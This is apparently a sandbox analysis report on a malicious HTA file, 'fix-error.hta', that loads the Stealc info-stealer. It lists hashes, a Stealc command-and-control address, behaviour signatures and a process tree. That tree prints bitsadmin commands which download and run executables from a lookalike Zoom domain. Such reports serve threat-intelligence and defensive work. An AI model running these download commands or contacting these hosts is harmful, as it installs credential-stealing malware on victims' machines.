Analysis
-
max time kernel
125s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-10-2024 09:42
Static task
static1
Behavioral task
behavioral1
Sample
fix-error.hta
Resource
win7-20240903-en
General
-
Target
fix-error.hta
-
Size
74KB
-
MD5
acfba6ff2e80e0ebc80df9e7d326337c
-
SHA1
fe28d5756815fdac31a744a2f11c075f5b1892bc
-
SHA256
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
-
SHA512
2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
-
SSDEEP
768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj
Malware Config
Extracted
stealc
sneprivate29
http://95.182.97.58
-
url_path
/84b7b6f977dd1c65.php
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
Processes:
resource yara_rule behavioral1/memory/2596-21-0x0000000000400000-0x0000000000561000-memory.dmp family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exeflow pid process 5 2616 mshta.exe 7 2616 mshta.exe 9 2616 mshta.exe 11 2616 mshta.exe 15 2616 mshta.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
-
Downloads MZ/PE file
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
stealc.exedescription pid process target process PID 2596 set thread context of 1944 2596 stealc.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3032 1036 WerFault.exe explorer.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
mshta.execmd.exetimeout.exebitsadmin.exebitsadmin.exetimeout.exestealc.execmd.exetaskkill.exeexplorer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 2652 timeout.exe 2644 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 484 taskkill.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
stealc.execmd.exeexplorer.exepid process 2596 stealc.exe 2596 stealc.exe 1944 cmd.exe 1944 cmd.exe 1036 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
stealc.execmd.exepid process 2596 stealc.exe 1944 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 484 taskkill.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.execmd.exestealc.execmd.exeexplorer.exedescription pid process target process PID 2616 wrote to memory of 2836 2616 mshta.exe cmd.exe PID 2616 wrote to memory of 2836 2616 mshta.exe cmd.exe PID 2616 wrote to memory of 2836 2616 mshta.exe cmd.exe PID 2616 wrote to memory of 2836 2616 mshta.exe cmd.exe PID 2616 wrote to memory of 2768 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 2768 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 2768 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 2768 2616 mshta.exe bitsadmin.exe PID 2836 wrote to memory of 2644 2836 cmd.exe timeout.exe PID 2836 wrote to memory of 2644 2836 cmd.exe timeout.exe PID 2836 wrote to memory of 2644 2836 cmd.exe timeout.exe PID 2836 wrote to memory of 2644 2836 cmd.exe timeout.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2596 2616 mshta.exe stealc.exe PID 2616 wrote to memory of 2652 2616 mshta.exe timeout.exe PID 2616 wrote to memory of 2652 2616 mshta.exe timeout.exe PID 2616 wrote to memory of 2652 2616 mshta.exe timeout.exe PID 2616 wrote to memory of 2652 2616 mshta.exe timeout.exe PID 2596 wrote to memory of 1944 2596 stealc.exe cmd.exe PID 2596 wrote to memory of 1944 2596 stealc.exe cmd.exe PID 2596 wrote to memory of 1944 2596 stealc.exe cmd.exe PID 2596 wrote to memory of 1944 2596 stealc.exe cmd.exe PID 2616 wrote to memory of 1092 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 1092 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 1092 2616 mshta.exe bitsadmin.exe PID 2616 wrote to memory of 1092 2616 mshta.exe bitsadmin.exe PID 2836 wrote to memory of 484 2836 cmd.exe taskkill.exe PID 2836 wrote to memory of 484 2836 cmd.exe taskkill.exe PID 2836 wrote to memory of 484 2836 cmd.exe taskkill.exe PID 2836 wrote to memory of 484 2836 cmd.exe taskkill.exe PID 2596 wrote to memory of 1944 2596 stealc.exe cmd.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1944 wrote to memory of 1036 1944 cmd.exe explorer.exe PID 1036 wrote to memory of 3032 1036 explorer.exe WerFault.exe PID 1036 wrote to memory of 3032 1036 explorer.exe WerFault.exe PID 1036 wrote to memory of 3032 1036 explorer.exe WerFault.exe PID 1036 wrote to memory of 3032 1036 explorer.exe WerFault.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fix-error.hta"1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID 26162⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\SysWOW64\timeout.exetimeout /t 30 /nobreak3⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 26163⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\stealc.exe"C:\Users\Admin\AppData\Local\Temp\stealc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 8085⤵
- Program crash
PID:3032
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\System32\timeout.exe" /T 2 /nobreak2⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2652
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer secondDownloadJob /download /priority foreground https://us18web-zoom.us/ram.exe C:\Users\Admin\AppData\Local\Temp\ram.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:1092
-
-
C:\Users\Admin\AppData\Local\Temp\ram.exe"C:\Users\Admin\AppData\Local\Temp\ram.exe"2⤵PID:2776
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\favicon[1].ico
Filesize5KB
MD5f3418a443e7d841097c714d69ec4bcb8
SHA149263695f6b0cdd72f45cf1b775e660fdc36c606
SHA2566da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA51282d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563
-
Filesize
1.0MB
MD512507d572b570facebbec5aebefeae6e
SHA19c256107da9675e6738b4755e680160b3b4129c8
SHA256a39cf0af479e97f78371a9f72b63ec72a5653e5658386e3cd9b7eae9e01a2924
SHA512888ee87b59e079604bc3d7a00bb70f4a490f7299b67bdc5feec0af7373dea0c4db4315456488b91b0bc28d92d3baf9911a6ffdd26f1119c38611a70e77adc135